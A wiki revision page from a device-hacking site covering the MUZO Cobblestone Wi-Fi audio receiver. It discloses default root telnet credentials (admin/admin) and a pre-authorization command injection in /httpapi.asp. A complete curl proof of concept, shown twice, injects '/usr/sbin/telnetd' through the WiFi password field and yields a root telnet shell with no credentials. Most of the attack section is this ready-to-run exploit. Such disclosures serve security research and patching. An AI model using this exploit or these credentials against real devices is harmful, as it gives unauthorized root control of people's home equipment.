Difference between revisions of "MUZO Cobblestone"

From Exploitee.rs
Jump to navigationJump to search
 
Line 16: Line 16:
The device permits logins with root permissions with the username of <code>admin</code> and password of <code>admin</code>
The device permits logins with root permissions with the username of <code>admin</code> and password of <code>admin</code>


==Pre Auth Root Command Injection==
==Pre Authorization Root Command Injection==


Target: /httpapi.asp
A pre-authorization command injection bug exists in the main application, as the WiFi password is directly passed to a command line utility. A simple command injection via a curl request can spawn a telnet shell, as the root user with no credentials needed.


Proof of Concept:
<pre style="white-space: pre-wrap;">
<pre style="white-space: pre-wrap;">
curl 'http://192.168.43.37/httpapi.asp' -H 'CONTENT-TYPE: application/x-www-form-urlencoded' -H 'Accept: */*' -H 'Cache-Control: no-cache' -H 'Connection: keep-alive' -H 'If-Modified-Since: 0, 0' --data 'command=wlanConnectApEx:ssid=636A32:ch=1:auth=WPA2PSK:encry=AES:pwd=3132333435363738;/usr/sbin/telnetd;:chext=0' --compressed
curl 'http://192.168.43.37/httpapi.asp' -H 'CONTENT-TYPE: application/x-www-form-urlencoded' -H 'Accept: */*' -H 'Cache-Control: no-cache' -H 'Connection: keep-alive' -H 'If-Modified-Since: 0, 0' --data 'command=wlanConnectApEx:ssid=636A32:ch=1:auth=WPA2PSK:encry=AES:pwd=3132333435363738;/usr/sbin/telnetd;:chext=0' --compressed
</pre>
</pre>
Connect to the telnet service as root

Latest revision as of 01:04, 11 August 2017

"Although the information we release has been verified and shown to work to the best our knowledge, we cant be held accountable for bricked devices or roots gone wrong."

MUZO.JPG

MUZO Cobblestone

"MUZO Cobblestone is a Wi-Fi Audio Receiver that makes your speakers wireless. Now you can control music play to your speakers without having to connect your audio cable to your speakers. Cobblestone is easy to set-up. Just connect your Cobblestone to your speaker, amplifier or receiver, and configure your Cobblestone to your home Wi-Fi network with our MUZO Player app and start streaming your favorite music. It’s as easy as that. AirPlay multi-room is supported for Cobblestones and not yet supported for 3rd party Airplay devices."

Purchase

Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device. Purchase the MUZO Cobblestone at Amazon

Telnet Default Credentials

The device permits logins with root permissions with the username of admin and password of admin

Pre Authorization Root Command Injection

A pre-authorization command injection bug exists in the main application, as the WiFi password is directly passed to a command line utility. A simple command injection via a curl request can spawn a telnet shell, as the root user with no credentials needed.

Proof of Concept:

curl 'http://192.168.43.37/httpapi.asp' -H 'CONTENT-TYPE: application/x-www-form-urlencoded' -H 'Accept: */*' -H 'Cache-Control: no-cache' -H 'Connection: keep-alive' -H 'If-Modified-Since: 0, 0' --data 'command=wlanConnectApEx:ssid=636A32:ch=1:auth=WPA2PSK:encry=AES:pwd=3132333435363738;/usr/sbin/telnetd;:chext=0' --compressed